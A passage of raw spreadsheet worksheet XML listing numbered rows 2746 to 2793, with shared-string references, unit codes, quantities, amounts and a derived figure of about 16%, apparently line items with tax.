        <v>2780</v>
      </c>
      <c r="C2746" s="238" t="s">
        <v>12421</v>
      </c>
      <c r="D2746" s="238" t="s">
        <v>12422</v>
      </c>
      <c r="E2746" s="238" t="s">
        <v>12423</v>
      </c>
      <c r="F2746" s="9"/>
      <c r="G2746" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2746" s="10">
        <v>1</v>
      </c>
      <c r="I2746" s="14">
        <v>120</v>
      </c>
      <c r="J2746" s="15">
        <v>19.2</v>
      </c>
      <c r="K2746" s="16"/>
    </row>
    <row r="2747" spans="2:11">
      <c r="B2747" s="9">
        <v>2781</v>
      </c>
      <c r="C2747" s="238" t="s">
        <v>12424</v>
      </c>
      <c r="D2747" s="238" t="s">
        <v>12425</v>
      </c>
      <c r="E2747" s="238" t="s">
        <v>4719</v>
      </c>
      <c r="F2747" s="238" t="s">
        <v>12426</v>
      </c>
      <c r="G2747" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2747" s="10">
        <v>8</v>
      </c>
      <c r="I2747" s="14">
        <v>4160</v>
      </c>
      <c r="J2747" s="15">
        <v>665.6</v>
      </c>
      <c r="K2747" s="16"/>
    </row>
    <row r="2748" spans="2:11">
      <c r="B2748" s="9">
        <v>2782</v>
      </c>
      <c r="C2748" s="238" t="s">
        <v>12427</v>
      </c>
      <c r="D2748" s="238" t="s">
        <v>12428</v>
      </c>
      <c r="E2748" s="238" t="s">
        <v>4719</v>
      </c>
      <c r="F2748" s="238" t="s">
        <v>12429</v>
      </c>
      <c r="G2748" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2748" s="10">
        <v>4</v>
      </c>
      <c r="I2748" s="14">
        <v>2080</v>
      </c>
      <c r="J2748" s="15">
        <v>332.8</v>
      </c>
      <c r="K2748" s="16"/>
    </row>
    <row r="2749" spans="2:11">
      <c r="B2749" s="9">
        <v>2783</v>
      </c>
      <c r="C2749" s="238" t="s">
        <v>12430</v>
      </c>
      <c r="D2749" s="238" t="s">
        <v>12431</v>
      </c>
      <c r="E2749" s="238" t="s">
        <v>12432</v>
      </c>
      <c r="F2749" s="238" t="s">
        <v>12433</v>
      </c>
      <c r="G2749" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2749" s="10">
        <v>6</v>
      </c>
      <c r="I2749" s="14">
        <v>2400</v>
      </c>
      <c r="J2749" s="15">
        <v>384</v>
      </c>
      <c r="K2749" s="16"/>
    </row>
    <row r="2750" spans="2:11">
      <c r="B2750" s="9">
        <v>2784</v>
      </c>
      <c r="C2750" s="238" t="s">
        <v>12434</v>
      </c>
      <c r="D2750" s="238" t="s">
        <v>12435</v>
      </c>
      <c r="E2750" s="238" t="s">
        <v>12432</v>
      </c>
      <c r="F2750" s="238" t="s">
        <v>12436</v>
      </c>
      <c r="G2750" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2750" s="10">
        <v>7</v>
      </c>
      <c r="I2750" s="14">
        <v>4224.77</v>
      </c>
      <c r="J2750" s="15">
        <v>675.9648</v>
      </c>
      <c r="K2750" s="16"/>
    </row>
    <row r="2751" spans="2:11">
      <c r="B2751" s="9">
        <v>2785</v>
      </c>
      <c r="C2751" s="238" t="s">
        <v>12437</v>
      </c>
      <c r="D2751" s="238" t="s">
        <v>12438</v>
      </c>
      <c r="E2751" s="238" t="s">
        <v>12432</v>
      </c>
      <c r="F2751" s="238" t="s">
        <v>12439</v>
      </c>
      <c r="G2751" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2751" s="10">
        <v>2</v>
      </c>
      <c r="I2751" s="14">
        <v>1040</v>
      </c>
      <c r="J2751" s="15">
        <v>166.4</v>
      </c>
      <c r="K2751" s="16"/>
    </row>
    <row r="2752" spans="2:11">
      <c r="B2752" s="9">
        <v>2786</v>
      </c>
      <c r="C2752" s="238" t="s">
        <v>12440</v>
      </c>
      <c r="D2752" s="238" t="s">
        <v>12441</v>
      </c>
      <c r="E2752" s="238" t="s">
        <v>12432</v>
      </c>
      <c r="F2752" s="238" t="s">
        <v>12442</v>
      </c>
      <c r="G2752" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2752" s="10">
        <v>2</v>
      </c>
      <c r="I2752" s="14">
        <v>800</v>
      </c>
      <c r="J2752" s="15">
        <v>128</v>
      </c>
      <c r="K2752" s="16"/>
    </row>
    <row r="2753" spans="2:11">
      <c r="B2753" s="9">
        <v>2787</v>
      </c>
      <c r="C2753" s="238" t="s">
        <v>12443</v>
      </c>
      <c r="D2753" s="238" t="s">
        <v>12444</v>
      </c>
      <c r="E2753" s="238" t="s">
        <v>12432</v>
      </c>
      <c r="F2753" s="238" t="s">
        <v>12445</v>
      </c>
      <c r="G2753" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2753" s="10">
        <v>2</v>
      </c>
      <c r="I2753" s="14">
        <v>2630.77</v>
      </c>
      <c r="J2753" s="15">
        <v>420.9248</v>
      </c>
      <c r="K2753" s="16"/>
    </row>
    <row r="2754" spans="2:11">
      <c r="B2754" s="9">
        <v>2788</v>
      </c>
      <c r="C2754" s="238" t="s">
        <v>12446</v>
      </c>
      <c r="D2754" s="238" t="s">
        <v>12447</v>
      </c>
      <c r="E2754" s="238" t="s">
        <v>12448</v>
      </c>
      <c r="F2754" s="238" t="s">
        <v>12449</v>
      </c>
      <c r="G2754" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2754" s="10">
        <v>2</v>
      </c>
      <c r="I2754" s="14">
        <v>8640</v>
      </c>
      <c r="J2754" s="15">
        <v>1382.4</v>
      </c>
      <c r="K2754" s="16"/>
    </row>
    <row r="2755" spans="2:11">
      <c r="B2755" s="9">
        <v>2789</v>
      </c>
      <c r="C2755" s="238" t="s">
        <v>12450</v>
      </c>
      <c r="D2755" s="238" t="s">
        <v>12451</v>
      </c>
      <c r="E2755" s="238" t="s">
        <v>12452</v>
      </c>
      <c r="F2755" s="238" t="s">
        <v>12453</v>
      </c>
      <c r="G2755" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2755" s="10">
        <v>2</v>
      </c>
      <c r="I2755" s="14">
        <v>7680</v>
      </c>
      <c r="J2755" s="15">
        <v>1228.8</v>
      </c>
      <c r="K2755" s="16"/>
    </row>
    <row r="2756" spans="2:11">
      <c r="B2756" s="9">
        <v>2790</v>
      </c>
      <c r="C2756" s="238" t="s">
        <v>12454</v>
      </c>
      <c r="D2756" s="238" t="s">
        <v>12455</v>
      </c>
      <c r="E2756" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2756" s="238" t="s">
        <v>6623</v>
      </c>
      <c r="G2756" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2756" s="10">
        <v>20</v>
      </c>
      <c r="I2756" s="14">
        <v>433.83</v>
      </c>
      <c r="J2756" s="15">
        <v>69.408</v>
      </c>
      <c r="K2756" s="16"/>
    </row>
    <row r="2757" spans="2:11">
      <c r="B2757" s="9">
        <v>2791</v>
      </c>
      <c r="C2757" s="238" t="s">
        <v>12456</v>
      </c>
      <c r="D2757" s="238" t="s">
        <v>12457</v>
      </c>
      <c r="E2757" s="238" t="s">
        <v>7745</v>
      </c>
      <c r="F2757" s="238" t="s">
        <v>12458</v>
      </c>
      <c r="G2757" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2757" s="10">
        <v>32</v>
      </c>
      <c r="I2757" s="14">
        <v>569.47</v>
      </c>
      <c r="J2757" s="15">
        <v>91.136</v>
      </c>
      <c r="K2757" s="16"/>
    </row>
    <row r="2758" spans="2:11">
      <c r="B2758" s="9">
        <v>2792</v>
      </c>
      <c r="C2758" s="238" t="s">
        <v>12459</v>
      </c>
      <c r="D2758" s="238" t="s">
        <v>10940</v>
      </c>
      <c r="E2758" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2758" s="238" t="s">
        <v>10941</v>
      </c>
      <c r="G2758" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2758" s="10">
        <v>188</v>
      </c>
      <c r="I2758" s="14">
        <v>626.07</v>
      </c>
      <c r="J2758" s="15">
        <v>100.1664</v>
      </c>
      <c r="K2758" s="16"/>
    </row>
    <row r="2759" spans="2:11">
      <c r="B2759" s="9">
        <v>2793</v>
      </c>
      <c r="C2759" s="238" t="s">
        <v>12460</v>
      </c>
      <c r="D2759" s="238" t="s">
        <v>12461</v>
      </c>
      <c r="E2759" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2759" s="238" t="s">
        <v>12462</v>
      </c>
      <c r="G2759" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2759" s="10">
        <v>140</v>
      </c>
      <c r="I2759" s="14">
        <v>656.16</v>
      </c>
      <c r="J2759" s="15">
        <v>105.056</v>
      </c>
      <c r="K2759" s="16"/>
    </row>
    <row r="2760" spans="2:11">
      <c r="B2760" s="9">
        <v>2794</v>
      </c>
      <c r="C2760" s="238" t="s">
        <v>12463</v>
      </c>
      <c r="D2760" s="238" t="s">
        <v>12464</v>
      </c>
      <c r="E2760" s="238" t="s">
        <v>4912</v>
      </c>
      <c r="F2760" s="238" t="s">
        <v>12465</v>
      </c>
      <c r="G2760" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2760" s="10">
        <v>20</v>
      </c>
      <c r="I2760" s="14">
        <v>20</v>
      </c>
      <c r="J2760" s="15">
        <v>3.2</v>
      </c>
      <c r="K2760" s="16"/>
    </row>
    <row r="2761" spans="2:11">
      <c r="B2761" s="9">
        <v>2795</v>
      </c>
      <c r="C2761" s="238" t="s">
        <v>12466</v>
      </c>
      <c r="D2761" s="238" t="s">
        <v>12467</v>
      </c>
      <c r="E2761" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2761" s="238" t="s">
        <v>12468</v>
      </c>
      <c r="G2761" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2761" s="10">
        <v>53</v>
      </c>
      <c r="I2761" s="14">
        <v>106.31</v>
      </c>
      <c r="J2761" s="15">
        <v>17.0448</v>
      </c>
      <c r="K2761" s="16"/>
    </row>
    <row r="2762" spans="2:11">
      <c r="B2762" s="9">
        <v>2796</v>
      </c>
      <c r="C2762" s="238" t="s">
        <v>12469</v>
      </c>
      <c r="D2762" s="238" t="s">
        <v>12470</v>
      </c>
      <c r="E2762" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2762" s="238" t="s">
        <v>12471</v>
      </c>
      <c r="G2762" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2762" s="10">
        <v>19</v>
      </c>
      <c r="I2762" s="14">
        <v>33.68</v>
      </c>
      <c r="J2762" s="15">
        <v>5.3808</v>
      </c>
      <c r="K2762" s="16"/>
    </row>
    <row r="2763" spans="2:11">
      <c r="B2763" s="9">
        <v>2797</v>
      </c>
      <c r="C2763" s="238" t="s">
        <v>12472</v>
      </c>
      <c r="D2763" s="238" t="s">
        <v>12473</v>
      </c>
      <c r="E2763" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F2763" s="238" t="s">
        <v>12474</v>
      </c>
      <c r="G2763" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2763" s="10">
        <v>19</v>
      </c>
      <c r="I2763" s="14">
        <v>856.74</v>
      </c>
      <c r="J2763" s="15">
        <v>137.0736</v>
      </c>
      <c r="K2763" s="16"/>
    </row>
    <row r="2764" spans="2:11">
      <c r="B2764" s="9">
        <v>2798</v>
      </c>
      <c r="C2764" s="238" t="s">
        <v>12475</v>
      </c>
      <c r="D2764" s="238" t="s">
        <v>12476</v>
      </c>
      <c r="E2764" s="238" t="s">
        <v>4753</v>
      </c>
      <c r="F2764" s="238" t="s">
        <v>12477</v>
      </c>
      <c r="G2764" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2764" s="10">
        <v>5</v>
      </c>
      <c r="I2764" s="14">
        <v>487.45</v>
      </c>
      <c r="J2764" s="15">
        <v>77.992</v>
      </c>
      <c r="K2764" s="16"/>
    </row>
    <row r="2765" spans="2:11">
      <c r="B2765" s="9">
        <v>2799</v>
      </c>
      <c r="C2765" s="238" t="s">
        <v>12478</v>
      </c>
      <c r="D2765" s="238" t="s">
        <v>12479</v>
      </c>
      <c r="E2765" s="238" t="s">
        <v>12480</v>
      </c>
      <c r="F2765" s="238" t="s">
        <v>12481</v>
      </c>
      <c r="G2765" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2765" s="10">
        <v>1</v>
      </c>
      <c r="I2765" s="14">
        <v>67.33</v>
      </c>
      <c r="J2765" s="15">
        <v>10.7728</v>
      </c>
      <c r="K2765" s="16"/>
    </row>
    <row r="2766" spans="2:11">
      <c r="B2766" s="9">
        <v>2800</v>
      </c>
      <c r="C2766" s="238" t="s">
        <v>12482</v>
      </c>
      <c r="D2766" s="238" t="s">
        <v>12483</v>
      </c>
      <c r="E2766" s="238" t="s">
        <v>12005</v>
      </c>
      <c r="F2766" s="238" t="s">
        <v>12484</v>
      </c>
      <c r="G2766" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2766" s="10">
        <v>1</v>
      </c>
      <c r="I2766" s="14">
        <v>80.34</v>
      </c>
      <c r="J2766" s="15">
        <v>12.8544</v>
      </c>
      <c r="K2766" s="16"/>
    </row>
    <row r="2767" spans="2:11">
      <c r="B2767" s="9">
        <v>2801</v>
      </c>
      <c r="C2767" s="238" t="s">
        <v>12485</v>
      </c>
      <c r="D2767" s="238" t="s">
        <v>12486</v>
      </c>
      <c r="E2767" s="238" t="s">
        <v>12487</v>
      </c>
      <c r="F2767" s="238" t="s">
        <v>12488</v>
      </c>
      <c r="G2767" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2767" s="10">
        <v>20</v>
      </c>
      <c r="I2767" s="14">
        <v>4364.25</v>
      </c>
      <c r="J2767" s="15">
        <v>698.272</v>
      </c>
      <c r="K2767" s="16"/>
    </row>
    <row r="2768" spans="2:11">
      <c r="B2768" s="9">
        <v>2802</v>
      </c>
      <c r="C2768" s="238" t="s">
        <v>12489</v>
      </c>
      <c r="D2768" s="238" t="s">
        <v>12490</v>
      </c>
      <c r="E2768" s="238" t="s">
        <v>7825</v>
      </c>
      <c r="F2768" s="238" t="s">
        <v>12491</v>
      </c>
      <c r="G2768" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2768" s="10">
        <v>17</v>
      </c>
      <c r="I2768" s="14">
        <v>1587.43</v>
      </c>
      <c r="J2768" s="15">
        <v>253.9936</v>
      </c>
      <c r="K2768" s="16"/>
    </row>
    <row r="2769" spans="2:11">
      <c r="B2769" s="9">
        <v>2803</v>
      </c>
      <c r="C2769" s="238" t="s">
        <v>12492</v>
      </c>
      <c r="D2769" s="238" t="s">
        <v>12493</v>
      </c>
      <c r="E2769" s="238" t="s">
        <v>3856</v>
      </c>
      <c r="F2769" s="238" t="s">
        <v>12494</v>
      </c>
      <c r="G2769" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2769" s="10">
        <v>2</v>
      </c>
      <c r="I2769" s="14">
        <v>1478.3</v>
      </c>
      <c r="J2769" s="15">
        <v>236.528</v>
      </c>
      <c r="K2769" s="16"/>
    </row>
    <row r="2770" spans="2:11">
      <c r="B2770" s="9">
        <v>2804</v>
      </c>
      <c r="C2770" s="238" t="s">
        <v>12495</v>
      </c>
      <c r="D2770" s="238" t="s">
        <v>12496</v>
      </c>
      <c r="E2770" s="238" t="s">
        <v>4758</v>
      </c>
      <c r="F2770" s="238" t="s">
        <v>12497</v>
      </c>
      <c r="G2770" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2770" s="10">
        <v>5</v>
      </c>
      <c r="I2770" s="14">
        <v>368.58</v>
      </c>
      <c r="J2770" s="15">
        <v>58.976</v>
      </c>
      <c r="K2770" s="16"/>
    </row>
    <row r="2771" spans="2:11">
      <c r="B2771" s="9">
        <v>2805</v>
      </c>
      <c r="C2771" s="238" t="s">
        <v>12498</v>
      </c>
      <c r="D2771" s="238" t="s">
        <v>12499</v>
      </c>
      <c r="E2771" s="238" t="s">
        <v>4817</v>
      </c>
      <c r="F2771" s="238" t="s">
        <v>12500</v>
      </c>
      <c r="G2771" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2771" s="10">
        <v>6</v>
      </c>
      <c r="I2771" s="14">
        <v>123.08</v>
      </c>
      <c r="J2771" s="15">
        <v>19.6896</v>
      </c>
      <c r="K2771" s="16"/>
    </row>
    <row r="2772" spans="2:11">
      <c r="B2772" s="9">
        <v>2806</v>
      </c>
      <c r="C2772" s="238" t="s">
        <v>12501</v>
      </c>
      <c r="D2772" s="238" t="s">
        <v>12502</v>
      </c>
      <c r="E2772" s="238" t="s">
        <v>12503</v>
      </c>
      <c r="F2772" s="238" t="s">
        <v>12504</v>
      </c>
      <c r="G2772" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2772" s="10">
        <v>4</v>
      </c>
      <c r="I2772" s="14">
        <v>63.87</v>
      </c>
      <c r="J2772" s="15">
        <v>10.2208</v>
      </c>
      <c r="K2772" s="16"/>
    </row>
    <row r="2773" spans="2:11">
      <c r="B2773" s="9">
        <v>2807</v>
      </c>
      <c r="C2773" s="238" t="s">
        <v>12505</v>
      </c>
      <c r="D2773" s="238" t="s">
        <v>12506</v>
      </c>
      <c r="E2773" s="238" t="s">
        <v>4926</v>
      </c>
      <c r="F2773" s="238" t="s">
        <v>12507</v>
      </c>
      <c r="G2773" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2773" s="10">
        <v>1</v>
      </c>
      <c r="I2773" s="14">
        <v>794.87</v>
      </c>
      <c r="J2773" s="15">
        <v>127.1792</v>
      </c>
      <c r="K2773" s="16"/>
    </row>
    <row r="2774" spans="2:11">
      <c r="B2774" s="9">
        <v>2808</v>
      </c>
      <c r="C2774" s="238" t="s">
        <v>12508</v>
      </c>
      <c r="D2774" s="238" t="s">
        <v>12354</v>
      </c>
      <c r="E2774" s="238" t="s">
        <v>11582</v>
      </c>
      <c r="F2774" s="9"/>
      <c r="G2774" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2774" s="10">
        <v>20</v>
      </c>
      <c r="I2774" s="14">
        <v>93.32</v>
      </c>
      <c r="J2774" s="15">
        <v>14.944</v>
      </c>
      <c r="K2774" s="16"/>
    </row>
    <row r="2775" spans="2:11">
      <c r="B2775" s="9">
        <v>2809</v>
      </c>
      <c r="C2775" s="238" t="s">
        <v>12509</v>
      </c>
      <c r="D2775" s="9"/>
      <c r="E2775" s="238" t="s">
        <v>12510</v>
      </c>
      <c r="F2775" s="238" t="s">
        <v>12511</v>
      </c>
      <c r="G2775" s="237" t="s">
        <v>6923</v>
      </c>
      <c r="H2775" s="10">
        <v>1</v>
      </c>
      <c r="I2775" s="14">
        <v>4700.86</v>
      </c>
      <c r="J2775" s="15">
        <v>752.1376</v>
      </c>
      <c r="K2775" s="16"/>
    </row>
    <row r="2776" spans="2:11">
      <c r="B2776" s="9">
        <v>2810</v>
      </c>
      <c r="C2776" s="238" t="s">
        <v>12512</v>
      </c>
      <c r="D2776" s="238" t="s">
        <v>6478</v>
      </c>
      <c r="E2776" s="238" t="s">
        <v>12513</v>
      </c>
      <c r="F2776" s="238" t="s">
        <v>12514</v>
      </c>
      <c r="G2776" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2776" s="10">
        <v>14</v>
      </c>
      <c r="I2776" s="14">
        <v>19145.28</v>
      </c>
      <c r="J2776" s="15">
        <v>3063.2448</v>
      </c>
      <c r="K2776" s="16"/>
    </row>
    <row r="2777" spans="2:11">
      <c r="B2777" s="9">
        <v>2811</v>
      </c>
      <c r="C2777" s="238" t="s">
        <v>12515</v>
      </c>
      <c r="D2777" s="238" t="s">
        <v>6478</v>
      </c>
      <c r="E2777" s="238" t="s">
        <v>12516</v>
      </c>
      <c r="F2777" s="238" t="s">
        <v>12517</v>
      </c>
      <c r="G2777" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2777" s="10">
        <v>15</v>
      </c>
      <c r="I2777" s="14">
        <v>20532.47</v>
      </c>
      <c r="J2777" s="15">
        <v>3285.192</v>
      </c>
      <c r="K2777" s="16"/>
    </row>
    <row r="2778" spans="2:11">
      <c r="B2778" s="9">
        <v>2812</v>
      </c>
      <c r="C2778" s="238" t="s">
        <v>12518</v>
      </c>
      <c r="D2778" s="238" t="s">
        <v>6478</v>
      </c>
      <c r="E2778" s="238" t="s">
        <v>12519</v>
      </c>
      <c r="F2778" s="238" t="s">
        <v>12520</v>
      </c>
      <c r="G2778" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2778" s="10">
        <v>10</v>
      </c>
      <c r="I2778" s="14">
        <v>16341.03</v>
      </c>
      <c r="J2778" s="15">
        <v>2614.56</v>
      </c>
      <c r="K2778" s="16"/>
    </row>
    <row r="2779" spans="2:11">
      <c r="B2779" s="9">
        <v>2813</v>
      </c>
      <c r="C2779" s="238" t="s">
        <v>12521</v>
      </c>
      <c r="D2779" s="238" t="s">
        <v>12487</v>
      </c>
      <c r="E2779" s="238" t="s">
        <v>12522</v>
      </c>
      <c r="F2779" s="238" t="s">
        <v>12523</v>
      </c>
      <c r="G2779" s="237" t="s">
        <v>3867</v>
      </c>
      <c r="H2779" s="10">
        <v>6</v>
      </c>
      <c r="I2779" s="14">
        <v>10641.03</v>
      </c>
      <c r="J2779" s="15">
        <v>1702.5696</v>
      </c>
      <c r="K2779" s="16"/>
    </row>
    <row r="2780" spans="2:11">
      <c r="B2780" s="9">
        <v>2814</v>
      </c>
      <c r="C2780" s="238" t="s">
        <v>12524</v>
      </c>
      <c r="D2780" s="238" t="s">
        <v>8367</v>
      </c>
      <c r="E2780" s="238" t="s">
        <v>8368</v>
      </c>
      <c r="F2780" s="238" t="s">
        <v>12525</v>
      </c>
      <c r="G2780" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H2780" s="10">
        <v>82</v>
      </c>
      <c r="I2780" s="14">
        <v>103905.95</v>
      </c>
      <c r="J2780" s="15">
        <v>16625.008</v>
      </c>
      <c r="K2780" s="16"/>
    </row>
    <row r="2781" spans="2:11">
      <c r="B2781" s="9">
        <v>2815</v>
      </c>
      <c r="C2781" s="238" t="s">
        <v>12526</v>
      </c>
      <c r="D2781" s="9"/>
      <c r="E2781" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F2781" s="238" t="s">
        <v>12527</v>
      </c>
      <c r="G2781" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2781" s="10">
        <v>270</v>
      </c>
      <c r="I2781" s="14">
        <v>31846.18</v>
      </c>
      <c r="J2781" s="15">
        <v>5095.44</v>
      </c>
      <c r="K2781" s="16"/>
    </row>
    <row r="2782" spans="2:11">
      <c r="B2782" s="9">
        <v>2816</v>
      </c>
      <c r="C2782" s="238" t="s">
        <v>12528</v>
      </c>
      <c r="D2782" s="238" t="s">
        <v>12529</v>
      </c>
      <c r="E2782" s="238" t="s">
        <v>11500</v>
      </c>
      <c r="F2782" s="238" t="s">
        <v>12525</v>
      </c>
      <c r="G2782" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H2782" s="10">
        <v>3000</v>
      </c>
      <c r="I2782" s="14">
        <v>8032.04</v>
      </c>
      <c r="J2782" s="15">
        <v>1286.4</v>
      </c>
      <c r="K2782" s="16"/>
    </row>
    <row r="2783" spans="2:11">
      <c r="B2783" s="9">
        <v>2817</v>
      </c>
      <c r="C2783" s="238" t="s">
        <v>12530</v>
      </c>
      <c r="D2783" s="238" t="s">
        <v>8374</v>
      </c>
      <c r="E2783" s="238" t="s">
        <v>8375</v>
      </c>
      <c r="F2783" s="238" t="s">
        <v>12531</v>
      </c>
      <c r="G2783" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2783" s="10">
        <v>1000</v>
      </c>
      <c r="I2783" s="14">
        <v>1627.85</v>
      </c>
      <c r="J2783" s="15">
        <v>260.8</v>
      </c>
      <c r="K2783" s="16"/>
    </row>
    <row r="2784" spans="2:11">
      <c r="B2784" s="9">
        <v>2818</v>
      </c>
      <c r="C2784" s="238" t="s">
        <v>12532</v>
      </c>
      <c r="D2784" s="238" t="s">
        <v>12533</v>
      </c>
      <c r="E2784" s="238" t="s">
        <v>12534</v>
      </c>
      <c r="F2784" s="238" t="s">
        <v>12535</v>
      </c>
      <c r="G2784" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2784" s="10">
        <v>60</v>
      </c>
      <c r="I2784" s="14">
        <v>12717.95</v>
      </c>
      <c r="J2784" s="15">
        <v>2034.912</v>
      </c>
      <c r="K2784" s="16"/>
    </row>
    <row r="2785" spans="2:11">
      <c r="B2785" s="9">
        <v>2819</v>
      </c>
      <c r="C2785" s="238" t="s">
        <v>12536</v>
      </c>
      <c r="D2785" s="238" t="s">
        <v>6712</v>
      </c>
      <c r="E2785" s="238" t="s">
        <v>12537</v>
      </c>
      <c r="F2785" s="238" t="s">
        <v>12538</v>
      </c>
      <c r="G2785" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2785" s="10">
        <v>2500</v>
      </c>
      <c r="I2785" s="14">
        <v>4074.17</v>
      </c>
      <c r="J2785" s="15">
        <v>652</v>
      </c>
      <c r="K2785" s="16"/>
    </row>
    <row r="2786" spans="2:11">
      <c r="B2786" s="9">
        <v>2820</v>
      </c>
      <c r="C2786" s="238" t="s">
        <v>12539</v>
      </c>
      <c r="D2786" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E2786" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2786" s="238" t="s">
        <v>12540</v>
      </c>
      <c r="G2786" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2786" s="10">
        <v>50</v>
      </c>
      <c r="I2786" s="14">
        <v>299.15</v>
      </c>
      <c r="J2786" s="15">
        <v>47.84</v>
      </c>
      <c r="K2786" s="16"/>
    </row>
    <row r="2787" spans="2:11">
      <c r="B2787" s="9">
        <v>2821</v>
      </c>
      <c r="C2787" s="238" t="s">
        <v>12541</v>
      </c>
      <c r="D2787" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E2787" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2787" s="238" t="s">
        <v>12542</v>
      </c>
      <c r="G2787" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H2787" s="10">
        <v>50</v>
      </c>
      <c r="I2787" s="14">
        <v>427.35</v>
      </c>
      <c r="J2787" s="15">
        <v>68.4</v>
      </c>
      <c r="K2787" s="16"/>
    </row>
    <row r="2788" spans="2:11">
      <c r="B2788" s="9">
        <v>2822</v>
      </c>
      <c r="C2788" s="238" t="s">
        <v>12543</v>
      </c>
      <c r="D2788" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E2788" s="238" t="s">
        <v>12544</v>
      </c>
      <c r="F2788" s="238" t="s">
        <v>12545</v>
      </c>
      <c r="G2788" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2788" s="10">
        <v>170</v>
      </c>
      <c r="I2788" s="14">
        <v>5552.19</v>
      </c>
      <c r="J2788" s="15">
        <v>888.352</v>
      </c>
      <c r="K2788" s="16"/>
    </row>
    <row r="2789" spans="2:11">
      <c r="B2789" s="9">
        <v>2823</v>
      </c>
      <c r="C2789" s="238" t="s">
        <v>12546</v>
      </c>
      <c r="D2789" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E2789" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2789" s="238" t="s">
        <v>8155</v>
      </c>
      <c r="G2789" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2789" s="10">
        <v>100</v>
      </c>
      <c r="I2789" s="14">
        <v>1594.32</v>
      </c>
      <c r="J2789" s="15">
        <v>255.04</v>
      </c>
      <c r="K2789" s="16"/>
    </row>
    <row r="2790" spans="2:11">
      <c r="B2790" s="9">
        <v>2824</v>
      </c>
      <c r="C2790" s="238" t="s">
        <v>12547</v>
      </c>
      <c r="D2790" s="238" t="s">
        <v>8559</v>
      </c>
      <c r="E2790" s="238" t="s">
        <v>5192</v>
      </c>
      <c r="F2790" s="238" t="s">
        <v>12548</v>
      </c>
      <c r="G2790" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2790" s="10">
        <v>4</v>
      </c>
      <c r="I2790" s="14">
        <v>64.27</v>
      </c>
      <c r="J2790" s="15">
        <v>10.2848</v>
      </c>
      <c r="K2790" s="16"/>
    </row>
    <row r="2791" spans="2:11">
      <c r="B2791" s="9">
        <v>2825</v>
      </c>
      <c r="C2791" s="238" t="s">
        <v>12549</v>
      </c>
      <c r="D2791" s="9"/>
      <c r="E2791" s="238" t="s">
        <v>12550</v>
      </c>
      <c r="F2791" s="238" t="s">
        <v>12551</v>
      </c>
      <c r="G2791" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2791" s="10">
        <v>52</v>
      </c>
      <c r="I2791" s="14">
        <v>2981.44</v>
      </c>
      <c r="J2791" s="15">
        <v>477.0688</v>
      </c>
      <c r="K2791" s="16"/>
    </row>
    <row r="2792" spans="2:11">
      <c r="B2792" s="9">
        <v>2826</v>
      </c>
      <c r="C2792" s="238" t="s">
        <v>12552</v>
      </c>
      <c r="D2792" s="9"/>
      <c r="E2792" s="238" t="s">
        <v>12544</v>
      </c>
      <c r="F2792" s="238" t="s">
        <v>12553</v>
      </c>
      <c r="G2792" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2792" s="10">
        <v>10</v>
      </c>
      <c r="I2792" s="14">
        <v>94.02</v>
      </c>
      <c r="J2792" s="15">
        <v>15.04</v>
      </c>
      <c r="K2792" s="16"/>
    </row>
    <row r="2793" spans="2:11">
      <c r="B2793" s="9">
        <v>2827</v>
      </c>
      <c r="C2793" s="238" t="s">
        <v>12554</v>
      </c>
      <c r="D2793" s="238" t="s">
        <v>7619</v>
      </c>
      <c r="E2793" s="238" t="s">
        <v>9521</v>
